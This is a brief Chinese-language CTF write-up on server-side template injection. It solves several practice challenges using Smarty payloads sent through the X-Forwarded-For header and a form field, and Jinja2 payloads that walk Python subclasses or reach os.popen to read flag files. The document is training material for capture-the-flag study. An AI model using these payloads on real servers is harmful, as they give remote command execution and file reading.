Web入门-SSTI模板注入攻击

做题

[CISCN 2019华东南]Web11

看到下方提示Smarty,即想到PHP的SSTI模板注入攻击。

右上角Current IP:后内容怀疑使用模板,内容来源于XFF请求头。

尝试修改请求头:

1
X-Forwarded-For: {4*4}

看到回显16,确凿了,直接PHP执行:

1
{system("cat /flag")}

[NISACTF 2022]midlevel

重题。

[HDCTF 2023]SearchMaster

1
data={system("cat /flag_13_searchmaster")}

[HNCTF 2022 WEEK2]ez_SSTI

一般SSTI参数先猜name,果然有,找到类_frozen_importlib_external.FileLoader的位置:

1
http://node5.anna.nssctf.cn:28392/?name={{"".__class__.__base__.__subclasses__()}}

每个docker都不一样,这里是118号,丢payload:

1
http://node5.anna.nssctf.cn:28392/?name={{"".__class__.__base__.__subclasses__()[118]["get_data"](0,"flag")}}

另一种payload是找os.popen函数:

1
http://node5.anna.nssctf.cn:28392/?name={{config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20flag%27).read()}}

Hackbar上都有,改改就能用。